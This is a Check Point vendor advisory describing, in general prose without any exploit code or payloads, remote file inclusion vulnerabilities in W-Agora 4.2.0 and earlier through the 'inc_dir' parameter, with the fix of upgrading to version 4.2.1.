Check Point Advisories

Update Protection against W-Agora 'inc_dir' Parameter Remote File Inclusion Vulnerabilities

Check Point Reference: CPAI-2006-131
Date Published: 13 Nov 2006
Severity: High
Last Updated: Thursday 03 May, 2007
Source: Secunia Advisory: SA20779
FrSIRT/ADV-2006-2507
Protection Provided by:
Who is Vulnerable? W-Agora version 4.2.0 and prior
Vulnerability Description W-Agora is an open source web publishing and forum software. It allows web administrators and their visitors to store and display messages, files, share discussions and other information on the web site. W-Agora is prone to multiple remote file inclusion vulnerabilities. An attacker can exploit these vulnerabilities to execute arbitrary PHP code on an affected system.
Update/Patch AvaliableUpdate to version 4.2.1.
http://www.w-agora.net/en/download.php
Vulnerability DetailsThe vulnerabilities are due to input validation errors in multiple scripts that do not validate the 'inc_dir' parameter prior to including files. A remote attacker could exploit this flaw via a specially crafted URL. By doing so, the attacker could include various vulnerable scripts and execute arbitrary commands on the vulnerable system.

Protection Overview

×
  Feedback
This website uses cookies for its functionality and for analytics and marketing purposes. By continuing to use this website, you agree to the use of cookies. For more information, please read our Cookies Notice.
OK